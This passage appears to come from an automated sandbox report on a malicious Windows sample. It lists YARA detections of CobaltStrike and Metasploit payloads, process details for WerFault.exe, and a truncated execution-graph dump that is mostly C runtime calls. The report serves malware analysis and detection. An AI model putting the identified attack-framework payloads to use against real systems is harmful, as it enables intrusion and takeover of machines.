                                                                                                                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                          Start time:19:37:04
                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 4020 -s 1316
                                                                                                                                                                                                                          Imagebase:0x7ff682550000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:10.6%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:18.9%
                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                            Total number of Limit Nodes:78
                                                                                                                                                                                                                            execution_graph 15574 7ff6029a87e1 15586 7ff6029a9258 15574->15586 15591 7ff6029a9fd0 GetLastError 15586->15591 15592 7ff6029aa011 FlsSetValue 15591->15592 15593 7ff6029a9ff4 FlsGetValue 15591->15593 15595 7ff6029aa023 15592->15595 15610 7ff6029aa001 SetLastError 15592->15610 15594 7ff6029aa00b 15593->15594 15593->15610 15594->15592 15622 7ff6029ada18 15595->15622 15598 7ff6029aa09d 15601 7ff6029a9384 __CxxCallCatchBlock 38 API calls 15598->15601 15599 7ff6029a9261 15613 7ff6029a9384 15599->15613 15607 7ff6029aa0a2 15601->15607 15602 7ff6029aa050 FlsSetValue 15605 7ff6029aa06e 15602->15605 15606 7ff6029aa05c FlsSetValue 15602->15606 15603 7ff6029aa040 FlsSetValue 15604 7ff6029aa049 15603->15604 15629 7ff6029a97c8 15604->15629 15635 7ff6029a9d74 15605->15635 15606->15604 15610->15598 15610->15599 15683 7ff6029b23d0 15613->15683 15627 7ff6029ada29 _set_fmode 15622->15627 15623 7ff6029ada7a 15643 7ff6029a4144 15623->15643 15624 7ff6029ada5e HeapAlloc 15625 7ff6029aa032 15624->15625 15624->15627 15625->15602 15625->15603 15627->15623 15627->15624 15640 7ff6029b2310 15627->15640 15630 7ff6029a97fc 15629->15630 15631 7ff6029a97cd RtlFreeHeap 15629->15631 15630->15610 15631->15630 15632 7ff6029a97e8 GetLastError 15631->15632 15633 7ff6029a97f5 __free_lconv_mon 15632->15633 15634 7ff6029a4144 _set_fmode 9 API calls 15633->15634 15634->15630 15669 7ff6029a9c4c 15635->15669 15646 7ff6029b2350 15640->15646 15652 7ff6029aa148 GetLastError 15643->15652 15645 7ff6029a414d 15645->15625 15651 7ff6029af158 EnterCriticalSection 15646->15651 15653 7ff6029aa189 FlsSetValue 15652->15653 15655 7ff6029aa16c 15652->15655 15654 7ff6029aa19b 15653->15654 15666 7ff6029aa179 15653->15666 15657 7ff6029ada18 _set_fmode 5 API calls 15654->15657 15655->15653 15655->15666 15656 7ff6029aa1f5 SetLastError 15656->15645 15658 7ff6029aa1aa 15657->15658 15659 7ff6029aa1c8 FlsSetValue 15658->15659 15660 7ff6029aa1b8 FlsSetValue 15658->15660 15662 7ff6029aa1d4 FlsSetValue 15659->15662 15663 7ff6029aa1e6 15659->15663 15661 7ff6029aa1c1 15660->15661 15664 7ff6029a97c8 __free_lconv_mon 5 API calls 15661->15664 15662->15661 15665 7ff6029a9d74 _set_fmode 5 API calls 15663->15665 15664->15666 15667 7ff6029aa1ee 15665->15667 15666->15656 15668 7ff6029a97c8 __free_lconv_mon 5 API calls 15667->15668 15668->15656 15681 7ff6029af158 EnterCriticalSection 15669->15681 15717 7ff6029b2388 15683->15717 15722 7ff6029af158 EnterCriticalSection 15717->15722 15787 7ff60299ab60 15788 7ff60299ab8e 15787->15788 15789 7ff60299ab75 15787->15789 15789->15788 15792 7ff6029ac47c 15789->15792 15793 7ff6029ac4c7 15792->15793 15797 7ff6029ac48b _set_fmode 15792->15797 15794 7ff6029a4144 _set_fmode 11 API calls 15793->15794 15796 7ff60299abee 15794->15796 15795 7ff6029ac4ae HeapAlloc 15795->15796 15795->15797 15797->15793 15797->15795 15798 7ff6029b2310 _set_fmode 2 API calls 15797->15798 15798->15797 19912 7ff6029b9e5e 19913 7ff6029b9e6d 19912->19913 19915 7ff6029b9e77 19912->19915 19916 7ff6029af1b8 LeaveCriticalSection 19913->19916 19921 7ff6029a4470 19922 7ff6029a447b 19921->19922 19930 7ff6029ae124 19922->19930 19943 7ff6029af158 EnterCriticalSection 19930->19943 19243 7ff60299bbc0 19244 7ff60299bbd0 19243->19244 19260 7ff6029a8a28 19244->19260 19246 7ff60299bbdc 19266 7ff60299beb8 19246->19266 19248 7ff60299c19c 7 API calls 19250 7ff60299bc75 19248->19250 19249 7ff60299bbf4 _RTC_Initialize 19258 7ff60299bc49 19249->19258 19271 7ff60299c068 19249->19271 19252 7ff60299bc09 19274 7ff6029a7e94 19252->19274 19258->19248 19259 7ff60299bc65 19258->19259 19261 7ff6029a8a39 19260->19261 19262 7ff6029a8a41 19261->19262 19263 7ff6029a4144 _set_fmode 11 API calls 19261->19263 19262->19246 19264 7ff6029a8a50 19263->19264 19265 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 19264->19265 19265->19262 19267 7ff60299bec9 19266->19267 19270 7ff60299bece __scrt_acquire_startup_lock 19266->19270 19268 7ff60299c19c 7 API calls 19267->19268 19267->19270 19269 7ff60299bf42 19268->19269 19270->19249 19299 7ff60299c02c 19271->19299 19273 7ff60299c071 19273->19252 19275 7ff60299bc15 19274->19275 19276 7ff6029a7eb4 19274->19276 19275->19258 19298 7ff60299c13c InitializeSListHead 19275->19298 19277 7ff6029a7ed2 GetModuleFileNameW 19276->19277 19278 7ff6029a7ebc 19276->19278 19282 7ff6029a7efd 19277->19282 19279 7ff6029a4144 _set_fmode 11 API calls 19278->19279 19280 7ff6029a7ec1 19279->19280 19281 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 19280->19281 19281->19275 19283 7ff6029a7e34 11 API calls 19282->19283 19284 7ff6029a7f3d 19283->19284 19285 7ff6029a7f45 19284->19285 19290 7ff6029a7f5d 19284->19290 19286 7ff6029a4144 _set_fmode 11 API calls 19285->19286 19287 7ff6029a7f4a 19286->19287 19288 7ff6029a97c8 __free_lconv_mon 11 API calls 19287->19288 19288->19275 19289 7ff6029a7f7f 19291 7ff6029a97c8 __free_lconv_mon 11 API calls 19289->19291 19290->19289 19292 7ff6029a7fc4 19290->19292 19293 7ff6029a7fab 19290->19293 19291->19275 19295 7ff6029a97c8 __free_lconv_mon 11 API calls 19292->19295 19294 7ff6029a97c8 __free_lconv_mon 11 API calls 19293->19294 19296 7ff6029a7fb4 19294->19296 19295->19289 19297 7ff6029a97c8 __free_lconv_mon 11 API calls 19296->19297 19297->19275 19300 7ff60299c046 19299->19300 19302 7ff60299c03f 19299->19302 19303 7ff6029a906c 19300->19303 19302->19273 19306 7ff6029a8ca8 19303->19306 19313 7ff6029af158 EnterCriticalSection 19306->19313 19953 7ff6029b9c43 19954 7ff6029b9c53 19953->19954 19957 7ff6029a44d8 LeaveCriticalSection 19954->19957 19331 7ff6029a8bd0 19334 7ff6029a8b4c 19331->19334 19341 7ff6029af158 EnterCriticalSection 19334->19341 19974 7ff6029a9e50 19975 7ff6029a9e55 19974->19975 19979 7ff6029a9e6a 19974->19979 19980 7ff6029a9e70 19975->19980 19981 7ff6029a9eba 19980->19981 19982 7ff6029a9eb2 19980->19982 19984 7ff6029a97c8 __free_lconv_mon 11 API calls 19981->19984 19983 7ff6029a97c8 __free_lconv_mon 11 API calls 19982->19983 19983->19981 19985 7ff6029a9ec7 19984->19985 19986 7ff6029a97c8 __free_lconv_mon 11 API calls 19985->19986 19987 7ff6029a9ed4 19986->19987 19988 7ff6029a97c8 __free_lconv_mon 11 API calls 19987->19988 19989 7ff6029a9ee1 19988->19989 19990 7ff6029a97c8 __free_lconv_mon 11 API calls 19989->19990 19991 7ff6029a9eee 19990->19991 19992 7ff6029a97c8 __free_lconv_mon 11 API calls 19991->19992 19993 7ff6029a9efb 19992->19993 19994 7ff6029a97c8 __free_lconv_mon 11 API calls 19993->19994 19995 7ff6029a9f08 19994->19995 19996 7ff6029a97c8 __free_lconv_mon 11 API calls 19995->19996 19997 7ff6029a9f15 19996->19997 19998 7ff6029a97c8 __free_lconv_mon 11 API calls 19997->19998 19999 7ff6029a9f25 19998->19999 20000 7ff6029a97c8 __free_lconv_mon 11 API calls 19999->20000 20001 7ff6029a9f35 20000->20001 20006 7ff6029a9d14 20001->20006 20020 7ff6029af158 EnterCriticalSection 20006->20020 15799 7ff6029af654 15800 7ff6029af678 15799->15800 15802 7ff6029af688 15799->15802 15801 7ff6029a4144 _set_fmode 11 API calls 15800->15801 15821 7ff6029af67d 15801->15821 15803 7ff6029af968 15802->15803 15804 7ff6029af6aa 15802->15804 15805 7ff6029a4144 _set_fmode 11 API calls 15803->15805 15806 7ff6029af6cb 15804->15806 15948 7ff6029afd10 15804->15948 15807 7ff6029af96d 15805->15807 15810 7ff6029af73d 15806->15810 15812 7ff6029af6f1 15806->15812 15817 7ff6029af731 15806->15817 15809 7ff6029a97c8 __free_lconv_mon 11 API calls 15807->15809 15809->15821 15814 7ff6029ada18 _set_fmode 11 API calls 15810->15814 15828 7ff6029af700 15810->15828 15811 7ff6029af7ea 15820 7ff6029af807 15811->15820 15829 7ff6029af859 15811->15829 15963 7ff6029a8540 15812->15963 15818 7ff6029af753 15814->15818 15816 7ff6029a97c8 __free_lconv_mon 11 API calls 15816->15821 15817->15811 15817->15828 15969 7ff6029b610c 15817->15969 15822 7ff6029a97c8 __free_lconv_mon 11 API calls 15818->15822 15825 7ff6029a97c8 __free_lconv_mon 11 API calls 15820->15825 15826 7ff6029af761 15822->15826 15823 7ff6029af719 15823->15817 15831 7ff6029afd10 45 API calls 15823->15831 15824 7ff6029af6fb 15827 7ff6029a4144 _set_fmode 11 API calls 15824->15827 15830 7ff6029af810 15825->15830 15826->15817 15826->15828 15833 7ff6029ada18 _set_fmode 11 API calls 15826->15833 15827->15828 15828->15816 15829->15828 15832 7ff6029b215c 40 API calls 15829->15832 15837 7ff6029b215c 40 API calls 15830->15837 15840 7ff6029af815 15830->15840 15831->15817 15834 7ff6029af896 15832->15834 15835 7ff6029af783 15833->15835 15836 7ff6029a97c8 __free_lconv_mon 11 API calls 15834->15836 15838 7ff6029a97c8 __free_lconv_mon 11 API calls 15835->15838 15839 7ff6029af8a0 15836->15839 15842 7ff6029af841 15837->15842 15838->15817 15839->15828 15839->15840 15841 7ff6029af95c 15840->15841 15845 7ff6029ada18 _set_fmode 11 API calls 15840->15845 15843 7ff6029a97c8 __free_lconv_mon 11 API calls 15841->15843 15844 7ff6029a97c8 __free_lconv_mon 11 API calls 15842->15844 15843->15821 15844->15840 15846 7ff6029af8e4 15845->15846 15847 7ff6029af8f5 15846->15847 15848 7ff6029af8ec 15846->15848 15930 7ff6029a9324 15847->15930 15849 7ff6029a97c8 __free_lconv_mon 11 API calls 15848->15849 15851 7ff6029af8f3 15849->15851 15857 7ff6029a97c8 __free_lconv_mon 11 API calls 15851->15857 15853 7ff6029af997 15856 7ff6029a9780 _isindst 17 API calls 15853->15856 15854 7ff6029af90c 16005 7ff6029b6224 15854->16005 15859 7ff6029af9ab 15856->15859 15857->15821 15862 7ff6029af9d4 15859->15862 15869 7ff6029af9e4 15859->15869 15860 7ff6029af954 15864 7ff6029a97c8 __free_lconv_mon 11 API calls 15860->15864 15861 7ff6029af933 15865 7ff6029a4144 _set_fmode 11 API calls 15861->15865 15863 7ff6029a4144 _set_fmode 11 API calls 15862->15863 15866 7ff6029af9d9 15863->15866 15864->15841 15867 7ff6029af938 15865->15867 15870 7ff6029a97c8 __free_lconv_mon 11 API calls 15867->15870 15868 7ff6029afcc7 15872 7ff6029a4144 _set_fmode 11 API calls 15868->15872 15869->15868 15871 7ff6029afa06 15869->15871 15870->15851 15873 7ff6029afa23 15871->15873 16024 7ff6029afdf8 15871->16024 15874 7ff6029afccc 15872->15874 15877 7ff6029afa97 15873->15877 15879 7ff6029afa4b 15873->15879 15885 7ff6029afa8b 15873->15885 15876 7ff6029a97c8 __free_lconv_mon 11 API calls 15874->15876 15876->15866 15881 7ff6029afabf 15877->15881 15886 7ff6029ada18 _set_fmode 11 API calls 15877->15886 15897 7ff6029afa5a 15877->15897 15878 7ff6029afb4a 15890 7ff6029afb67 15878->15890 15898 7ff6029afbba 15878->15898 16039 7ff6029a857c 15879->16039 15883 7ff6029ada18 _set_fmode 11 API calls 15881->15883 15881->15885 15881->15897 15891 7ff6029afae1 15883->15891 15884 7ff6029a97c8 __free_lconv_mon 11 API calls 15884->15866 15885->15878 15885->15897 16045 7ff6029b5fcc 15885->16045 15892 7ff6029afab1 15886->15892 15888 7ff6029afa55 15894 7ff6029a4144 _set_fmode 11 API calls 15888->15894 15889 7ff6029afa73 15889->15885 15900 7ff6029afdf8 45 API calls 15889->15900 15895 7ff6029a97c8 __free_lconv_mon 11 API calls 15890->15895 15896 7ff6029a97c8 __free_lconv_mon 11 API calls 15891->15896 15893 7ff6029a97c8 __free_lconv_mon 11 API calls 15892->15893 15893->15881 15894->15897 15899 7ff6029afb70 15895->15899 15896->15885 15897->15884 15898->15897 15939 7ff6029b215c 15898->15939 15904 7ff6029b215c 40 API calls 15899->15904 15910 7ff6029afb76 15899->15910 15900->15885 15902 7ff6029afbf8 15903 7ff6029a97c8 __free_lconv_mon 11 API calls 15902->15903 15905 7ff6029afc02 15903->15905 15907 7ff6029afba2 15904->15907 15905->15897 15905->15910 15906 7ff6029afcbb 15908 7ff6029a97c8 __free_lconv_mon 11 API calls 15906->15908 15909 7ff6029a97c8 __free_lconv_mon 11 API calls 15907->15909 15908->15866 15909->15910 15910->15906 15911 7ff6029ada18 _set_fmode 11 API calls 15910->15911 15912 7ff6029afc47 15911->15912 15913 7ff6029afc4f 15912->15913 15914 7ff6029afc58 15912->15914 15915 7ff6029a97c8 __free_lconv_mon 11 API calls 15913->15915 16069 7ff6029af2f4 15914->16069 15917 7ff6029afc56 15915->15917 15924 7ff6029a97c8 __free_lconv_mon 11 API calls 15917->15924 15919 7ff6029afc6e SetEnvironmentVariableW 15921 7ff6029afc92 15919->15921 15922 7ff6029afcb3 15919->15922 15920 7ff6029afcfb 15923 7ff6029a9780 _isindst 17 API calls 15920->15923 15926 7ff6029a4144 _set_fmode 11 API calls 15921->15926 15925 7ff6029a97c8 __free_lconv_mon 11 API calls 15922->15925 15927 7ff6029afd0f 15923->15927 15924->15866 15925->15906 15928 7ff6029afc97 15926->15928 15929 7ff6029a97c8 __free_lconv_mon 11 API calls 15928->15929 15929->15917 15931 7ff6029a9331 15930->15931 15932 7ff6029a933b 15930->15932 15931->15932 15937 7ff6029a9356 15931->15937 15933 7ff6029a4144 _set_fmode 11 API calls 15932->15933 15934 7ff6029a9342 15933->15934 15935 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 15934->15935 15936 7ff6029a934e 15935->15936 15936->15853 15936->15854 15937->15936 15938 7ff6029a4144 _set_fmode 11 API calls 15937->15938 15938->15934 15940 7ff6029b217e 15939->15940 15941 7ff6029b219b 15939->15941 15940->15941 15942 7ff6029b218c 15940->15942 15943 7ff6029b21a5 15941->15943 16090 7ff6029b6c18 15941->16090 15944 7ff6029a4144 _set_fmode 11 API calls 15942->15944 16078 7ff6029b6c54 15943->16078 15947 7ff6029b2191 memcpy_s 15944->15947 15947->15902 15949 7ff6029afd45 15948->15949 15950 7ff6029afd2d 15948->15950 15951 7ff6029ada18 _set_fmode 11 API calls 15949->15951 15950->15806 15952 7ff6029afd69 15951->15952 15953 7ff6029afdca 15952->15953 15957 7ff6029ada18 _set_fmode 11 API calls 15952->15957 15958 7ff6029a97c8 __free_lconv_mon 11 API calls 15952->15958 15959 7ff6029a9324 __std_exception_copy 37 API calls 15952->15959 15960 7ff6029afdd9 15952->15960 15962 7ff6029afdee 15952->15962 15955 7ff6029a97c8 __free_lconv_mon 11 API calls 15953->15955 15954 7ff6029a9384 __CxxCallCatchBlock 45 API calls 15956 7ff6029afdf4 15954->15956 15955->15950 15957->15952 15958->15952 15959->15952 15961 7ff6029a9780 _isindst 17 API calls 15960->15961 15961->15962 15962->15954 15964 7ff6029a8550 15963->15964 15968 7ff6029a8559 15963->15968 15964->15968 16097 7ff6029a8018 15964->16097 15968->15823 15968->15824 15970 7ff6029b6119 15969->15970 15971 7ff6029b52bc 15969->15971 15972 7ff6029a3ec8 45 API calls 15970->15972 15973 7ff6029b52c9 15971->15973 15974 7ff6029b52ff 15971->15974 15976 7ff6029b614d 15972->15976 15977 7ff6029a4144 _set_fmode 11 API calls 15973->15977 15992 7ff6029b5270 15973->15992 15975 7ff6029b5329 15974->15975 15983 7ff6029b534e 15974->15983 15978 7ff6029a4144 _set_fmode 11 API calls 15975->15978 15979 7ff6029b6152 15976->15979 15984 7ff6029b6163 15976->15984 15987 7ff6029b617a 15976->15987 15980 7ff6029b52d3 15977->15980 15982 7ff6029b532e 15978->15982 15979->15817 15981 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 15980->15981 15985 7ff6029b52de 15981->15985 15986 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 15982->15986 15993 7ff6029a3ec8 45 API calls 15983->15993 15998 7ff6029b5339 15983->15998 15988 7ff6029a4144 _set_fmode 11 API calls 15984->15988 15985->15817 15986->15998 15990 7ff6029b6184 15987->15990 15991 7ff6029b6196 15987->15991 15989 7ff6029b6168 15988->15989 15994 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 15989->15994 15995 7ff6029a4144 _set_fmode 11 API calls 15990->15995 15996 7ff6029b61be 15991->15996 15997 7ff6029b61a7 15991->15997 15992->15817 15993->15998 15994->15979 15999 7ff6029b6189 15995->15999 16392 7ff6029b7fb4 15996->16392 16383 7ff6029b530c 15997->16383 15998->15817 16002 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 15999->16002 16002->15979 16004 7ff6029a4144 _set_fmode 11 API calls 16004->15979 16006 7ff6029a3ec8 45 API calls 16005->16006 16007 7ff6029b628a 16006->16007 16008 7ff6029b6298 16007->16008 16432 7ff6029adda4 16007->16432 16435 7ff6029a450c 16008->16435 16012 7ff6029a3ec8 45 API calls 16014 7ff6029b6307 16012->16014 16013 7ff6029b6384 16015 7ff6029b6395 16013->16015 16016 7ff6029a97c8 __free_lconv_mon 11 API calls 16013->16016 16018 7ff6029adda4 5 API calls 16014->16018 16020 7ff6029b6310 16014->16020 16017 7ff6029af92f 16015->16017 16019 7ff6029a97c8 __free_lconv_mon 11 API calls 16015->16019 16016->16015 16017->15860 16017->15861 16018->16020 16019->16017 16021 7ff6029a450c 14 API calls 16020->16021 16022 7ff6029b636b 16021->16022 16022->16013 16023 7ff6029b6373 SetEnvironmentVariableW 16022->16023 16023->16013 16025 7ff6029afe38 16024->16025 16026 7ff6029afe1b 16024->16026 16025->16025 16027 7ff6029ada18 _set_fmode 11 API calls 16025->16027 16026->15873 16034 7ff6029afe5c 16027->16034 16028 7ff6029afee0 16030 7ff6029a9384 __CxxCallCatchBlock 45 API calls 16028->16030 16029 7ff6029afebd 16031 7ff6029a97c8 __free_lconv_mon 11 API calls 16029->16031 16032 7ff6029afee6 16030->16032 16031->16026 16033 7ff6029ada18 _set_fmode 11 API calls 16033->16034 16034->16028 16034->16029 16034->16033 16035 7ff6029a97c8 __free_lconv_mon 11 API calls 16034->16035 16036 7ff6029af2f4 37 API calls 16034->16036 16037 7ff6029afecc 16034->16037 16035->16034 16036->16034 16038 7ff6029a9780 _isindst 17 API calls 16037->16038 16038->16028 16040 7ff6029a858c 16039->16040 16044 7ff6029a8595 16039->16044 16040->16044 16462 7ff6029a808c 16040->16462 16044->15888 16044->15889 16046 7ff6029b5fd9 16045->16046 16050 7ff6029b6006 16045->16050 16047 7ff6029b5fde 16046->16047 16046->16050 16048 7ff6029a4144 _set_fmode 11 API calls 16047->16048 16049 7ff6029b5fe3 16048->16049 16052 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16049->16052 16051 7ff6029b604a 16050->16051 16053 7ff6029b6069 16050->16053 16067 7ff6029b603e __crtLCMapStringW 16050->16067 16054 7ff6029a4144 _set_fmode 11 API calls 16051->16054 16055 7ff6029b5fee 16052->16055 16056 7ff6029b6085 16053->16056 16057 7ff6029b6073 16053->16057 16058 7ff6029b604f 16054->16058 16055->15885 16061 7ff6029a3ec8 45 API calls 16056->16061 16060 7ff6029a4144 _set_fmode 11 API calls 16057->16060 16059 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16058->16059 16059->16067 16062 7ff6029b6078 16060->16062 16063 7ff6029b6092 16061->16063 16064 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16062->16064 16063->16067 16509 7ff6029b7b70 16063->16509 16064->16067 16067->15885 16068 7ff6029a4144 _set_fmode 11 API calls 16068->16067 16070 7ff6029af301 16069->16070 16072 7ff6029af30b 16069->16072 16070->16072 16076 7ff6029af327 16070->16076 16071 7ff6029a4144 _set_fmode 11 API calls 16073 7ff6029af313 16071->16073 16072->16071 16074 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16073->16074 16075 7ff6029af31f 16074->16075 16075->15919 16075->15920 16076->16075 16077 7ff6029a4144 _set_fmode 11 API calls 16076->16077 16077->16073 16079 7ff6029b6c73 16078->16079 16080 7ff6029b6c69 16078->16080 16081 7ff6029b6c78 16079->16081 16088 7ff6029b6c7f _set_fmode 16079->16088 16082 7ff6029ac47c _fread_nolock 12 API calls 16080->16082 16083 7ff6029a97c8 __free_lconv_mon 11 API calls 16081->16083 16086 7ff6029b6c71 16082->16086 16083->16086 16084 7ff6029b6c85 16087 7ff6029a4144 _set_fmode 11 API calls 16084->16087 16085 7ff6029b6cb2 RtlReAllocateHeap 16085->16086 16085->16088 16086->15947 16087->16086 16088->16084 16088->16085 16089 7ff6029b2310 _set_fmode 2 API calls 16088->16089 16089->16088 16091 7ff6029b6c21 16090->16091 16092 7ff6029b6c3a HeapSize 16090->16092 16093 7ff6029a4144 _set_fmode 11 API calls 16091->16093 16094 7ff6029b6c26 16093->16094 16095 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16094->16095 16096 7ff6029b6c31 16095->16096 16096->15943 16098 7ff6029a8031 16097->16098 16099 7ff6029a802d 16097->16099 16120 7ff6029b1370 16098->16120 16099->15968 16112 7ff6029a836c 16099->16112 16104 7ff6029a804f 16146 7ff6029a80fc 16104->16146 16105 7ff6029a8043 16106 7ff6029a97c8 __free_lconv_mon 11 API calls 16105->16106 16106->16099 16109 7ff6029a97c8 __free_lconv_mon 11 API calls 16110 7ff6029a8076 16109->16110 16111 7ff6029a97c8 __free_lconv_mon 11 API calls 16110->16111 16111->16099 16113 7ff6029a8395 16112->16113 16118 7ff6029a83ae 16112->16118 16113->15968 16114 7ff6029ada18 _set_fmode 11 API calls 16114->16118 16115 7ff6029a843e 16117 7ff6029a97c8 __free_lconv_mon 11 API calls 16115->16117 16116 7ff6029af574 WideCharToMultiByte 16116->16118 16117->16113 16118->16113 16118->16114 16118->16115 16118->16116 16119 7ff6029a97c8 __free_lconv_mon 11 API calls 16118->16119 16119->16118 16121 7ff6029a8036 16120->16121 16122 7ff6029b137d 16120->16122 16126 7ff6029b16ac GetEnvironmentStringsW 16121->16126 16165 7ff6029aa0a4 16122->16165 16127 7ff6029a803b 16126->16127 16128 7ff6029b16dc 16126->16128 16127->16104 16127->16105 16129 7ff6029af574 WideCharToMultiByte 16128->16129 16130 7ff6029b172d 16129->16130 16131 7ff6029b1734 FreeEnvironmentStringsW 16130->16131 16132 7ff6029ac47c _fread_nolock 12 API calls 16130->16132 16131->16127 16133 7ff6029b1747 16132->16133 16134 7ff6029b174f 16133->16134 16135 7ff6029b1758 16133->16135 16136 7ff6029a97c8 __free_lconv_mon 11 API calls 16134->16136 16137 7ff6029af574 WideCharToMultiByte 16135->16137 16138 7ff6029b1756 16136->16138 16139 7ff6029b177b 16137->16139 16138->16131 16140 7ff6029b177f 16139->16140 16141 7ff6029b1789 16139->16141 16142 7ff6029a97c8 __free_lconv_mon 11 API calls 16140->16142 16143 7ff6029a97c8 __free_lconv_mon 11 API calls 16141->16143 16144 7ff6029b1787 FreeEnvironmentStringsW 16142->16144 16143->16144 16144->16127 16147 7ff6029a8121 16146->16147 16148 7ff6029ada18 _set_fmode 11 API calls 16147->16148 16155 7ff6029a8157 16148->16155 16149 7ff6029a97c8 __free_lconv_mon 11 API calls 16150 7ff6029a8057 16149->16150 16150->16109 16151 7ff6029a81d2 16152 7ff6029a97c8 __free_lconv_mon 11 API calls 16151->16152 16152->16150 16153 7ff6029ada18 _set_fmode 11 API calls 16153->16155 16154 7ff6029a81c1 16377 7ff6029a8328 16154->16377 16155->16151 16155->16153 16155->16154 16156 7ff6029a9324 __std_exception_copy 37 API calls 16155->16156 16159 7ff6029a81f7 16155->16159 16162 7ff6029a97c8 __free_lconv_mon 11 API calls 16155->16162 16163 7ff6029a815f 16155->16163 16156->16155 16161 7ff6029a9780 _isindst 17 API calls 16159->16161 16160 7ff6029a97c8 __free_lconv_mon 11 API calls 16160->16163 16164 7ff6029a820a 16161->16164 16162->16155 16163->16149 16166 7ff6029aa0d0 FlsSetValue 16165->16166 16167 7ff6029aa0b5 FlsGetValue 16165->16167 16168 7ff6029aa0c2 16166->16168 16170 7ff6029aa0dd 16166->16170 16167->16168 16169 7ff6029aa0ca 16167->16169 16171 7ff6029aa0c8 16168->16171 16172 7ff6029a9384 __CxxCallCatchBlock 45 API calls 16168->16172 16169->16166 16173 7ff6029ada18 _set_fmode 11 API calls 16170->16173 16185 7ff6029b1044 16171->16185 16174 7ff6029aa145 16172->16174 16175 7ff6029aa0ec 16173->16175 16176 7ff6029aa10a FlsSetValue 16175->16176 16177 7ff6029aa0fa FlsSetValue 16175->16177 16179 7ff6029aa128 16176->16179 16180 7ff6029aa116 FlsSetValue 16176->16180 16178 7ff6029aa103 16177->16178 16181 7ff6029a97c8 __free_lconv_mon 11 API calls 16178->16181 16182 7ff6029a9d74 _set_fmode 11 API calls 16179->16182 16180->16178 16181->16168 16183 7ff6029aa130 16182->16183 16184 7ff6029a97c8 __free_lconv_mon 11 API calls 16183->16184 16184->16171 16208 7ff6029b12b4 16185->16208 16187 7ff6029b1079 16223 7ff6029b0d44 16187->16223 16190 7ff6029ac47c _fread_nolock 12 API calls 16191 7ff6029b10a7 16190->16191 16192 7ff6029b10af 16191->16192 16194 7ff6029b10be 16191->16194 16193 7ff6029a97c8 __free_lconv_mon 11 API calls 16192->16193 16205 7ff6029b1096 16193->16205 16194->16194 16230 7ff6029b13ec 16194->16230 16197 7ff6029b11d4 16202 